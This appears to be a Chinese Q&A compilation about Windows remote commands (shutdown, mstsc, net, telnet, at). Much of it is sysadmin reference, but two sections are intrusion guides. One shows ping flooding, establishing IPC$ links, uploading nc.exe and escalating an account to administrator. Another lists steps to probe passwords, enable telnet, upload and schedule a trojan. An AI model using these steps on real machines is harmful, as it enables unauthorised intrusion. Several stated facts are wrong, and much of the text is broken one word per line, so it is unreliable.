啟動遠程機器命令

A. 如何遠程啟動電腦

我們有必要先了解一下WINDOWS XP的關機。Windows XP系統通過一個名為Shutdown.exe的程序來完成關機操作(位置在Windows\System下)，一般情況下XP的關機是由關機程序shutdown.exe來實現的，關機的時候調用shutdown.exe。由此可知要阻止強行關機就是要取消對shutdown.exe的調用。而筆者發現沖擊波和震盪波的關機重啟都要調用這個程序，於是答案由此而生：

在彈出強行關機的對話框時，快速打開[運行]窗口(按下CTRL+R)，輸入「shutdown.exe -a」(注意有一個空格)，回車，這時你可以看到強行關機的對話框消失了。然後就可以輕松地幹掉沖擊波和震盪波。

當然這種方法不僅可用於此，其它一些原因引起的關機也如法炮製。

既然談到shutdown.exe,有必要將其它重要參數介紹一下：

shutdown.exe -a 取消關機

shutdown.exe -f 強行關閉應用程序。

shutdown.exe -m \計算機名 控制遠程計算機。

shutdown.exe -i 顯示圖形用戶界面，但必須是Shutdown的第一個參數。

shutdown.exe -l 注銷當前用戶。

shutdown.exe -r 關機並重啟。

shutdown.exe -t時間 設置關機倒計時。

shutdown.exe -c"消息內容" 輸入關機對話框中的消息內容(不能超127個字元)。

比如你的電腦要在23:00關機，可以選擇「開始→運行」，輸入「at 23:00 Shutdown -s」，這樣，到了23點，電腦就會出現「系統關機」對話框，默認有30秒鍾的倒計時並提示你保存工作。如果你想以倒計時的方式關機，可以輸入「Shutdown.exe -s -t 3600」，這里表示60分鍾後自動關機，「3600」代表60分鍾。

如果想取消的話，可以在運行中輸入「shutdown -a」。另外輸入「shutdown -i」，則可以打開設置自動關機對話框，對自動關機進行設置。

雖然shutdown.exe是Windows XP下的程序，在Windows2000中是調用Windows下System中的Shell32.dll文件來實現關機的，例如「indir\RunDLL32.exe indir\System\Shell32.dll，SHExitWindowsEx 8」，但在Win2000也可利用它，方法如下：

在WinXP安裝目錄下的System32文件夾中找到Shutdown.exe，將它復制到Win2000安裝目錄下的System32文件夾中，在「運行」中輸入「Shutdown.exe」，即可像在Windows XP中一樣使用該程序了。

當然，shutdown.exe還有一些強大的功能，讀者可以進一步實踐探討，充分利用 shutdown.exe 的強大功能。

==

關機文件SHUTDOWN常用參數
在Windows XP中，新增了一條命令行工具「shutdown」，其作用是「關閉或重新啟動本地或遠程計算機」。利用它，我們不但可以注銷用戶，關閉或重新啟動計算機，還可以實現定時關機、遠程關機。

該命令的語法格式如下：

shutdown [-i |-l|-s |-r |-a] [-f] [-m [\\ComputerName]] [-t xx] [-c "message"] [-d[u][p]:xx:yy] 其中，各參數的含義為：

-i 顯示圖形界面的對話框。

-l 注銷當前用戶，這是默認設置。-m ComputerName 優先。

-s 關閉計算機。

-r 關閉之後重新啟動。

-a 中止關閉。除了 -l 和 ComputerName 外，系統將忽略其它參數。在超時期間，您只可以使用 -a。

-f 強制運行要關閉的應用程序。

-m [\\ComputerName] 指定要關閉的計算機。

-t xx 將用於系統關閉的定時器設置為 xx 秒。默認值是 20 秒。

-c "message" 指定將在「系統關閉」窗口中的「消息」區域顯示的消息。最多可以使用 127 個字元。引號中必須包含消息。

-d [u][p]:xx:yy 列出系統關閉的原因代碼。

首先，我們來看一下該命令的一些基本用法：

1、注銷當前用戶

shutdown - l

該命令只能注銷本機用戶，對遠程計算機不適用。

2、關閉本地計算機 shutdown - s

3、重啟本地計算機

shutdown - r

4、定時關機

shutdown - s -t 30

指定在30秒之後自動關閉計算機。

5、中止計算機的關閉

有時我們設定了計算機定時關機後，如果出於某種原因又想取消這次關機操作，就可以用 shutdown - a 來中止。如：

shutdown -s – t 300 設定計算機在5分鍾後關閉。

Shutdown – a 取消上述關機操作。

以上是shutdown命令在本機中的一些基本應用。前面我們已經介紹過，該命令除了關閉、重啟本地計算機外，更重要的是它還能對遠程計算機進行操作，但是如何才能實現呢？

在該命令的格式中，有一個參數[-m [\\ComputerName]，用它可以指定將要關閉或重啟的計算機名稱，省略的話則默認為對本機操作。於是，我用以下命令試了一下：

shutdown –s –m \\netproxy -t 30

(在30秒內關閉計算機名為netproxy的機器；註：netproxy為區域網內一台同樣裝有Windows XP的電腦)

但該命令執行後，計算機netproxy一點反應都沒有，我的屏幕上卻返回這樣一句話：Access is denied （拒絕訪問）。

為什麼會出現這種情況呢？我想了半天，四處查找有關的資料，終於發現，在Windows XP默認的安全策略中，只有管理員組的用戶才有權從遠端關閉計算機，而一般情況下我們從區域網內的其他電腦來訪問該計算機時，則只有guest用戶許可權，所以當我們執行上述命令時，便會出現「拒絕訪問」的情況。

找到問題的根源之後，解決的辦法也很簡單，只要在客戶計算機（能夠被遠程關閉的計算機，如上述的netproxy）中賦予guest用戶遠程關機的許可權即可。這可利用Windows XP的「組策略」或「管理工具」中的「本地安全策略」來實現。下面以「組策略」為例進行介紹：

1、單擊「開始」按鈕，選擇「運行」，在對話框中輸入「gpedit.msc」，然後單擊「確定」，打開「組策略編輯器」。

2、在「組策略」窗口的左窗格中打開「計算機配置」—「Windows 設置」—「安全設置」—「本地策略」—「用戶權利指派」。
3、在「組策略」窗口的右窗格中選擇「Force shutdown from a remote system （從遠端系統強制關機）」，雙擊。

4、在彈出的對話框中顯示目前只有「Administrators」組的成員才有權從遠程關機；單擊對話框下方的「添加用戶或組」按鈕，然後在新彈出的對話框中輸入「guest」，再單擊「確定」。

5、這時在「從遠端系統強制關機」的屬性中便添加了一個「guest」用戶，單擊「確定」即可。

6、關閉「組策略」窗中。

通過上述操作後，我們便給計算機netproxy的guest用戶授予了遠程關機的許可權。以後，我們要遠程關閉計算機netproxy，只要在網路中其他裝有Windows XP 的電腦中輸入以下命令即可：

shutdown -s –m \\netproxy -t 30 （其他參數用法同上）

這時，在netproxy計算機的屏幕上將顯示一個「系統關機」的對話框，提示「系統即將關機。請保存所有正在運行的工作，然後注銷。未保存的改動將會丟失。關機是由netproxy\guest初始的。」在對話框下方還有一個計時器，顯示離關機還有多少時間。在等待關機的時間里，用戶還可以執行其他的任務，如關閉程序、打開文件等，但無法關閉該對話框，除非你用shutdown –a命令來中止關機任務。

最後，有一點要說明的是，shutdown命令不但可以遠程關閉裝有Windows XP系統的計算機，它還可以遠程關閉裝有Windows 2000系統的計算機（對於Win9X嘛，好像不適用）。有關Windows 2000客戶計算機上的一些設置，操作方法同上，這里就不再多說了。

另外shutdown作為一個外部命令（其對應文件為\Windows\system32文件夾下的shutdown.exe），我們還可將它復制到Windows 2000的機器上，這樣，在裝有Windows 2000系統的機器之間便也能相互實現遠程關機。

B. 運行里如何啟動遠程桌面連接 是什麼命令

dos遠程桌面連接命令
mstsc
/v:
192.168.1.250
/console
cmd
運行
command
刪除文件
rd
文件名/s
創建文件
md
文件名
1.
net
user
admin
godmour
/add
新建一個用戶名為
admin
密碼為
godmour
默認為user組成員
2.
net
user
admin
/del
將用戶名為admin的用戶刪除
3.
net
user
admin
/active:no
將用戶admin禁用
4.
net
user
admin
/active:yes
將用戶admin激活
5.
net
user
admin
查看擁護admin用戶的情況
6.
net
localgroup
administratros
admin
/add
提升用戶許可權
7.
net
view
\\ip
查看遠程主機共享資源
8.
net
use
x:\\ip\sharename
遠程影射本地盤符
z
（建立連接
net
use
\\ip\ipc$"password"
/user:"name")
9.
net
user
admin
godmour
把admin的密碼修改成
godmour
10.
net
start
servername
啟動
telnet
服務
net
start
servername
停止
telnet
服務
運行
輸入cmd
回車在命令提示符下輸入
for
%1
in
(%windir%\system32\*.dll)
do
regsvr32.exe
/s
%1
還原系統
tracert
61.144.56.101
查看路由是否正常工作
netstat命令
netstat
[-r]
[-s]
[-n]
[-a]。
當然，你也可以利用「netstat
/?」命令來查看一下該命令的使用格式以及詳細的參數說明
netstat參數含義如下
-r
顯示本機路由表的內容
-s
顯示每個協議的使用狀態（包括tcp協議、udp協議、ip協議）
-n
以數字表格形式顯示地址和埠
-a
顯示所有主機的埠號
運行netstat
-a命令將顯示計算機上網時與外部之間的所有連接，計算機埠與外部的連接情況等；而netstat
-s命令則顯示電腦網路連接協議的統計信息。這樣你就可以看到當前你的電腦上網路在進行哪些連接，數據包發
送和接收的詳細情況等等

C. 計算機遠程命令有那些

一，ping
它是用來檢查網路是否通暢或者網路連接速度的命令。作為一個生活在網路上的管理員或者黑客來說，ping命令是第一個必須掌握的DOS命令，它所利用的原理是這樣的：網路上的機器都有唯一確定的IP地址，我們給目標IP地址發送一個數據包，對方就要返回一個同樣大小的數據包，根據返回的數據包我們可以確定目標主機的存在，可以初步判斷目標主機的操作系統等。下面就來看看它的一些常用的操作。先看看幫助吧，在DOS窗口中鍵入：ping /? 回車，。所示的幫助畫面。在此，我們只掌握一些基本的很有用的參數就可以了（下同）。
-t 表示將不間斷向目標IP發送數據包，直到我們強迫其停止。試想，如果你使用100M的寬頻接入，而目標IP是56K的小貓，那麼要不了多久，目標IP就因為承受不了這么多的數據而掉線，呵呵，一次攻擊就這么簡單的實現了。
-l 定義發送數據包的大小，默認為32位元組，我們利用它可以最大定義到65500位元組。結合上面介紹的-t參數一起使用，會有更好的效果哦。
-n 定義向目標IP發送數據包的次數，默認為3次。如果網路速度比較慢，3次對我們來說也浪費了不少時間，因為現在我們的目的僅僅是判斷目標IP是否存在，那麼就定義為一次吧。
說明一下，如果-t 參數和 -n參數一起使用，ping命令就以放在後面的參數為標准，比如"ping IP -t -n 3"，雖然使用了-t參數，但並不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主機域名，這樣就可以得到主機的IP。
下面我們舉個例子來說明一下具體用法。
這里time=2表示從發出數據包到接受到返回數據包所用的時間是2秒，從這里可以判斷網路連接速度的大小 。從TTL的返回值可以初步判斷被ping主機的操作系統，之所以說"初步判斷"是因為這個值是可以修改的。這里TTL=32表示操作系統可能是win98。
（小知識：如果TTL=128，則表示目標主機可能是Win2000；如果TTL=250，則目標主機可能是Unix）
至於利用ping命令可以快速查找區域網故障，可以快速搜索最快的QQ伺服器，可以對別人進行ping攻擊……這些就靠大家自己發揮了。
二，nbtstat
該命令使用TCP/IP上的NetBIOS顯示協議統計和當前TCP/IP連接，使用這個命令你可以得到遠程主機的NETBIOS信息，比如用戶名、所屬的工作組、網卡的MAC地址等。在此我們就有必要了解幾個基本的參數。
-a 使用這個參數，只要你知道了遠程主機的機器名稱，就可以得到它的NETBIOS信息（下同）。
-A 這個參數也可以得到遠程主機的NETBIOS信息，但需要你知道它的IP。
-n 列出本地機器的NETBIOS信息。
當得到了對方的IP或者機器名的時候，就可以使用nbtstat命令來進一步得到對方的信息了，這又增加了我們入侵的保險系數。
三，netstat
這是一個用來查看網路狀態的命令，操作簡便功能強大。
-a 查看本地機器的所有開放埠，可以有效發現和預防木馬，可以知道機器所開的服務等信息，如圖4。
這里可以看出本地機器開放有FTP服務、Telnet服務、郵件服務、WEB服務等。用法：netstat -a IP。
-r 列出當前的路由信息，告訴我們本地機器的網關、子網掩碼等信息。用法：netstat -r IP。
四，tracert
跟蹤路由信息，使用此命令可以查出數據從本地機器傳輸到目標主機所經過的所有途徑，這對我們了解網路布局和結構很有幫助。如圖5。
這里說明數據從本地機器傳輸到192.168.0.1的機器上，中間沒有經過任何中轉，說明這兩台機器是在同一段區域網內。用法：tracert IP。
五，net
這個命令是網路命令中最重要的一個，必須透徹掌握它的每一個子命令的用法，因為它的功能實在是太強大了，這簡直就是微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令，鍵入net /?回車如圖6。
在這里，我們重點掌握幾個入侵常用的子命令。
net view
使用此命令查看遠程主機的所以共享資源。命令格式為net view \IP。
net use
把遠程主機的某個共享資源影射為本地盤符，圖形界面方便使用，呵呵。命令格式為net use x: \IP\sharename。上面一個表示把192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7建立IPC$連接（net use \IP\IPC$ "password" /user:"name"），
建立了IPC$連接後，呵呵，就可以上傳文件了： nc.exe \192.168.0.7\admin$，表示把本地目錄下的nc.exe傳到遠程主機，結合後面要介紹到的其他DOS命令就可以實現入侵了。
net start
使用它來啟動遠程主機上的服務。當你和遠程主機建立連接後，如果發現它的什麼服務沒有啟動，而你又想利用此服務怎麼辦？就使用這個命令來啟動吧。用法：net start servername，如圖9，成功啟動了telnet服務。
net stop
入侵後發現遠程主機的某個服務礙手礙腳，怎麼辦？利用這個命令停掉就ok了，用法和net start同。
net user
查看和帳戶有關的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的，最重要的，它為我們克隆帳戶提供了前提。鍵入不帶參數的net user，可以查看所有用戶，包括已經禁用的。下面分別講解。
1，net user abcd 1234 /add，新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。
2，net user abcd /del，將用戶名為abcd的用戶刪除。
3，net user abcd /active:no，將用戶名為abcd的用戶禁用。
4，net user abcd /active:yes，激活用戶名為abcd的用戶。
5，net user abcd，查看用戶名為abcd的用戶的情況
net localgroup
查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的net localgroup即列出當前所有的用戶組。在入侵過程中，我們一般利用它來把某個帳戶提升為administrator組帳戶，這樣我們利用這個帳戶就可以控制整個遠程主機了。用法：net localgroup groupname username /add。
現在我們把剛才新建的用戶abcd加到administrator組里去了，這時候abcd用戶已經是超級管理員了，呵呵，你可以再使用net user abcd來查看他的狀態，和圖10進行比較就可以看出來。但這樣太明顯了，網管一看用戶情況就能漏出破綻，所以這種方法只能對付菜鳥網管，但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理員，這是後話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。
net time
這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機裡面，那麼也許就用不到這個命令了。但簡單的入侵成功了，難道只是看看嗎？我們需要進一步滲透。這就連遠程主機當前的時間都需要知道，因為利用時間和其他手段（後面會講到）可以實現某個命令和程序的定時啟動，為我們進一步入侵打好基礎。用法：net time \IP。
六，at
這個命令的作用是安排在特定日期或時間執行某個特定的命令和程序（知道net time的重要了吧？）。當我們知道了遠程主機的當前時間，就可以利用此命令讓其在以後的某個時間（比如2分鍾後）執行某個程序和命令。用法：at time command \computer。
表示在6點55分時，讓名稱為a-01的計算機開啟telnet服務（這里net start telnet即為開啟telnet服務的命令）。
七，ftp
大家對這個命令應該比較熟悉了吧？網路上開放的ftp的主機很多，其中很大一部分是匿名的，也就是說任何人都可以登陸上去。現在如果你掃到了一台開放ftp服務的主機（一般都是開了21埠的機器），如果你還不會使用ftp的命令怎麼辦？下面就給出基本的ftp命令使用方法。
首先在命令行鍵入ftp回車，出現ftp的提示符，這時候可以鍵入"help"來查看幫助（任何DOS命令都可以使用此方法查看其幫助)。
大家可能看到了，這么多命令該怎麼用？其實也用不到那麼多，掌握幾個基本的就夠了。
首先是登陸過程，這就要用到open了，直接在ftp的提示符下輸入"open 主機IP ftp埠"回車即可，一般埠默認都是21，可以不寫。接著就是輸入合法的用戶名和密碼進行登陸了，這里以匿名ftp為例介紹。
用戶名和密碼都是ftp，密碼是不顯示的。當提示**** logged in時，就說明登陸成功。這里因為是匿名登陸，所以用戶顯示為Anonymous。
接下來就要介紹具體命令的使用方法了。
dir 跟DOS命令一樣，用於查看伺服器的文件，直接敲上dir回車，就可以看到此ftp伺服器上的文件。
cd 進入某個文件夾。
get 下載文件到本地機器。
put 上傳文件到遠程伺服器。這就要看遠程ftp伺服器是否給了你可寫的許可權了，如果可以，呵呵，該怎麼 利用就不多說了，大家就自由發揮去吧。
delete 刪除遠程ftp伺服器上的文件。這也必須保證你有可寫的許可權。
bye 退出當前連接。
quit 同上。
八，telnet
功能強大的遠程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什麼？它操作簡單，如同使用自己的機器一樣，只要你熟悉DOS命令，在成功以administrator身份連接了遠程機器後，就可以用它來干你想乾的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。
然後在提示符下鍵入open IP回車，這時就出現了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。
當輸入用戶名和密碼都正確後就成功建立了telnet連接，這時候你就在遠程主機上具有了和此用戶一樣的許可權，利用DOS命令就可以實現你想乾的事情了。這里我使用的超級管理員許可權登陸的。
到這里為止，網路DOS命令的介紹就告一段落了，這里介紹的目的只是給菜鳥網管一個印象，讓其知道熟悉和掌握網路DOS命令的重要性。其實和網路有關的DOS命令還遠不止這些，這里只是拋磚引玉，希望能對廣大菜鳥網管有所幫助。學好DOS對當好網管有很大的幫助，特別的熟練掌握了一些網路的DOS命令。
另外大家應該清楚，任何人要想進入系統，必須得有一個合法的用戶名和密碼（輸入法漏洞差不多絕跡了吧），哪怕你拿到帳戶的只有一個很小的許可權，你也可以利用它來達到最後的目的。所以堅決消滅空口令，給自己的帳戶加上一個強壯的密碼，是最好的防禦弱口令入侵的方法。
最後，由衷的說一句，培養良好的安全意識才是最重要的。

D. cmd里遠程命令是什麼

cmd中遠程的命令為：mstsc。

用戶在電腦運行欄中輸入『mstsc』即可打開遠程桌面。

Mstsc （全稱：Microsoft terminal services client），指創建與終端伺服器或其他遠程計算機的連接，編輯現有「遠程桌面連接(.rdp)」配置文件，並將WindowsXP連接遷移到新的.rdp文件中。

Mstsc還有一種說法，Microsoft Telnet Screen Control ，即「微軟遠程桌面控制」。

(4)啟動遠程機器命令擴展閱讀：

CMD相關命令

1. calc-----------啟動計算器

2.certmgr.msc----證書管理實用程序

3.charmap--------啟動字元映射表

4.chkdsk.exe-----Chkdsk磁碟檢查

5. ciadv.msc------索引服務程序

6. cleanmgr-------垃圾整理

7. cliconfg-------SQL SERVER 客戶端網路實用程序

8. Clipbrd--------剪貼板查看器

9.cmd.exe--------CMD命令提示符

10. compmgmt.msc---計算機管理

11. conf-----------啟動netmeeting

12. dcomcnfg-------打開系統組件服務

13. ddeshare-------打開DDE共享設置

14. devmgmt.msc---設備管理器

15. dfrg.msc-------磁碟碎片整理程序

16. diskmgmt.msc---磁碟管理實用程序

17. drwtsn32------ 系統醫生

18. dvdplay--------DVD播放器

19. dxdiag---------檢查DirectX信息

20. explorer-------打開資源管理器

21. eudcedit-------造字程序

22. eventvwr-------事件查看器

23. fsmgmt.msc-----共享文件夾管理器

24. gpedit.msc-----組策略

25. iexpress-------木馬捆綁工具，系統自帶

26. logoff---------注銷命令

27. lusrmgr.msc----本機用戶和組

28. notepad--------打開記事本

29. magnify--------放大鏡實用程序

30. mem.exe--------顯示內存使用情況

31. mmc------------打開控制台49.

32. mobsync--------同步命令

參考資料：網路-CMD命令

E. 如何使用命令實現遠程關機和重啟

遠程桌面能帶來很大的方便，需要使用其他電腦也不用東奔西走了，可以操縱本機一樣操作其他電腦，但是需要對遠程電腦進行關機或重啟時就遇到了問題，點擊開始只有注銷和斷開。
方法一、在遠程桌面窗口下使用alt+f4即可實現關機、注銷
方法二、使用任務管理器，
在任務欄右鍵—任務管理器
在關機（u）中可以選擇
備註：如果電腦加入域的話可能看不到這個選項
方法三、使用shutdown
命令
關機：shutdown
-s
-f
-t
0
注銷：shutdown
-r
-f
-t
0
在開始—運行中或開始—運行—cmd中使用此命令即可

F. 啟動遠程桌面的命令

啟動遠程桌面的命令是在開始菜單里選擇運行。在運行裡面輸入 Mstsc就可以打開遠程桌面連接。

G. 如何用命令打開遠程計算機的telnet 服務

0、偵測遠程機器口令
-
1、netuse命令建立IPC連接
net
use
\IP
password
/user:administrator
用sc命令把禁用的telnet服務變成自動
sc
\IP
config
tlntsvr
start=
auto
2、用sc命令將telnet啟動
sc
\IP
start
tlntsvr
3、net
share
建立c$共享
net
share
sharename=drive:path
4、命令上傳木馬

a.bat
\192.168.0.1c$
5、at命令定時執行
at
\192.168.0.1
time
cmd
注意：如果對方採用了NTLM認證策略，可以連接網路注冊表修改HKEYLOCAL
.0下的NTLM鍵值由2改為0。
然後重新啟動telnet服務。
6、用sc命令將telnet關閉
sc
\IP
stop
tlntsvr
--7、用sc命令將telnet啟動
sc
\IP
start
tlntsvr